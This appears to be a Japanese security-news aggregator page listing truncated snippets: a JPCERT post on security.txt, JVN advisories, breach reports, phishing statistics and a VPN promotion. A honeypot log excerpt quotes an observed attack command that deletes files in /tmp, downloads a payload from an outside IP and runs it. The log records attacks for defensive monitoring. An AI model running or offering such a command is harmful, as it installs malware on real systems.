RFC 9116「security.txt」の紹介(2022年8月)の続報 - JPCERT/CC Eyes
早期警戒グループの戸塚です。昨年(2022年)8月に「A File Format to Aid in Security Vulnerability Disclosure - 正しくつながる第一歩」[1]で、同年4月に公開された「RFC 9116:A File Format to Aid in Security Vulnerability Disclosure」[2]を紹介しました。本記事では、その続報を2つお届けします(RFC 9116自体や私の業務との関係に関しては、2022年8月の記事をご確認ください)。 1つ目は、RFC 9116のおかげで開発者との脆弱性関連情報のコーディネーション(調整)が大変スムーズにできた事例です。 開発者との調整では、連絡しても応答がもらえないケースが少なくないことは昨年8月の記事でも書きました。このような場合、別の連絡先があればそちらにも連絡を試みます。今
JVNVU#93840158: 富士電機製複数製品における複数の脆弱性
富士電機株式会社が提供するTELLUS、TELLUS Lite、TELLUS Simulator、V-Server、V-Server Liteには、複数の脆弱性が存在します。 CVE-2023-47580、CVE-2023-47581、CVE-2023-47582 TELLUS V4.0.17.0およびそれ以前 TELLUS Lite V4.0.17.0およびそれ以前(日本以外のリージョン製品) CVE-2023-47583 TELLUS Simulator V4.0.17.0およびそれ以前 CVE-2023-47584、CVE-2023-47585、CVE-2023-47586 V-Server V4.0.18.0およびそれ以前 V-Server Lite V4.0.18.0およびそれ以前(日本以外のリージョン製品) 富士電機株式会社が提供する遠隔監視ソフトウェアTELLUS、TELLU
脆弱性管理ツール「yamory」、ソフトウェアのEOLを検知して通知する機能 | IT Leaders
IT Leaders トップ > テクノロジー一覧 > セキュリティ > 新製品・サービス > 脆弱性管理ツール「yamory」、ソフトウェアのEOLを検知して通知する機能 セキュリティ セキュリティ記事一覧へ [新製品・サービス] 脆弱性管理ツール「yamory」、ソフトウェアのEOLを検知して通知する機能 2023年11月10日(金)日川 佳三(IT Leaders編集部) リスト ビジョナルグループのアシュアードは2023年11月9日、クラウド型脆弱性管理ツール「yamory(ヤモリー)」に、ソフトウェアのサポート終了時期(EOL:End Of Life)を管理する機能を追加した。yamoryは、ITシステムの脆弱性を脆弱性データベースと照合して検出し、対応策を通知するクラウドサービス。新機能は、yamoryでスキャンしたソフトウェア情報に対してEOLが近づいていることを検知して3段
JVNVU#98040889: Trend Micro Apex OneおよびTrend Micro Apex One SaaSにおける複数の脆弱性(2023年11月)
想定される影響は各脆弱性により異なりますが、次のような影響を受ける可能性があります。詳細についてはトレンドマイクロ株式会社が提供するアドバイザリを参照してください。 セキュリティエージェントにおけるリンク解釈の問題に起因した権限昇格 - CVE-2023-47192 セキュリティエージェントにおけるオリジン確認エラーの脆弱性に起因した権限昇格 - CVE-2023-47193、CVE-2023-47194、CVE-2023-47195、CVE-2023-47196、CVE-2023-47197、CVE-2023-47198、CVE-2023-47199 プラグインマネージャモジュールにおけるオリジン確認エラーの脆弱性に起因した権限昇格 - CVE-2023-47200、CVE-2023-47201 マネジメントコンソールにおけるローカルファイルインクルードの脆弱性に起因した権限昇格 - C
2023/11/04 ハニーポット(仮) 観測記録 - コンニチハレバレトシタアオゾラ
ハニーポット(仮) 観測記録 2023/11/04分です。 特徴 共通 GPONルータの脆弱性を狙うアクセス CensysInspectによるスキャン行為 zgrabによるスキャン行為 /.envへのスキャン行為 Location:JP D-link製品の脆弱性を狙うアクセス PHPUnitの脆弱性(CVE-2017-9841)を狙うアクセス Spring Bootの脆弱性を狙うアクセス aiohttpによるスキャン行為 curlによるスキャン行為 /.awsへのスキャン行為 phpMyAdminへのスキャン行為 Gh0stRATのような動き UserAgentがHello, worldであるアクセス を確認しました。 /shellに対する以下のアクセスを確認しました。 cd /tmp; rm -rf *; wget 91.92.243.35/jaws; sh /tmp/jaws cd /
USBメモリーは原則禁止→全面禁止に NTT西子会社の情報漏えいで、NTT島田社長が表明
11月7日に開かれたNTTの2023年度第2四半期決算会見では、NTT西日本グループ企業で発生した情報漏えいに関する質問が記者から飛び出した。これに対し同社の島田社長は「誠に申し訳ない」と謝罪。社内で定められた情報管理に関するルールの再確認と恒久的な対策の実施を明言した。 この漏えい問題はNTTマーケティングアクトProCXが発表したもので、コールセンター用システムの運用保守を依頼していたNTTビジネスソリューションズの元派遣社員が、クライアントから預かっていた顧客情報900万件を不正に持ち出していたとされている。これにより、NTTドコモなどのグループ企業やWOWOW、福岡県といった自治体の情報にも影響が出たことが分かっている。 テレマーケティング業務を委託されたNTTマーケティングアクトProCXは、NTTビジネスソリューションズ(NTT BS)のコールセンターシステムを利用。情報漏えい
東京海上日動の代理店システムの参照設定不備についてまとめてみた - piyolog
2023年10月30日、東京海上日動火災保険は、保険代理店向けに提供しているシステムの設定に不備があり、本来アクセスできない契約者の個人情報を参照していた可能性があると公表しました。ここでは関連する情報をまとめます。 代理店システムで設定不備 問題が起きたのは東京海上日動火災保険(以下東京海上日動と記載)が運用する保険代理店向けに提供しているシステム。保険代理店はこのシステムを通じて保険の募集や管理を行っている。 東京海上日動は勤務型代理店制度を導入しており、同社が契約を結ぶ代理店として統括代理店、勤務型代理店の2種類が存在する。この2者は共同で顧客対応を行っているため、先のシステム上で顧客情報の共有を行っていた。 統括代理店 勤務型代理店の教育、指導、管理を行う。 勤務型代理店 所属保険会社、統括代理店の三者間で保険代理店委託契約書を締結している個人代理店。統括代理店への勤務報告などを行
フィッシング対策協議会 Council of Anti-Phishing Japan | 報告書類 | 月次報告書 | 2023/10 フィッシング報告状況
フィッシング報告件数 2023 年 10 月にフィッシング対策協議会に寄せられたフィッシング報告件数 (海外含む) は、前月より 39,771 件増加し、156,804 件となりました。 フィッシングサイトの URL 件数 2023 年 10 月のフィッシングサイトの URL 件数 (重複なし) は、前月より 1,427 件減少し、13,507 件となりました。 フィッシングに悪用されたブランド件数 2023 年 10 月のフィッシングに悪用されたブランド件数 (海外含む) は、前月より 2 件減少し、78 件となりました。 総評 2023 年 10 月のフィッシング報告件数は 156,804 件となり、2023 年 9 月と比較すると 39,771 件、約 34.0 % 増加しました。 Amazon および ETC利用照会サービスをかたるフィッシングの報告が各 5 万件を超え、あわせて報
高速VPNの7つの利点
VPNは、一般的にセキュリティとプライバシーを強化するために有用なツールです。これについては、これまでに何度かブログで説明してきました。今回は、超高速なVPNにはどんな利点があるのかについて説明します。 1. 海外のスポーツやテレビ番組を視聴する 熱狂的なサッカーファンは「見たい試合があるのに国内では中継していない」とがっかりすることがよくあります。こういった思いをするのはもちろんサッカーファンに限らず、バスケットボールや野球など他のスポーツファンも一緒です。反対に、海外への引っ越しや海外旅行に行くとき、大好きなサッカー、野球、ラグビーなどのチームの試合が現地のテレビで放映されずがっかりすることがあります。また国内で大人気のドラマも海外に行くと見られないこともよくあります。こういった問題は、好きな試合や番組のデジタル放送を提供するサービスに自分の居住地域で加入すれば解決するかも知れませんが
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
【セキュリティ ニュース】監視分析製品「Veeam ONE」に深刻な脆弱性 - ホットフィクスを提供(1ページ目 / 全1ページ):Security NEXT
GitHub、コードの脆弱性を発見後に修正コードまで自動生成してくれる「Code scanning autofix」発表
【セキュリティ ニュース】SysAidのITSMツールにゼロデイ攻撃 - 更新や侵害状況の確認を(1ページ目 / 全1ページ):Security NEXT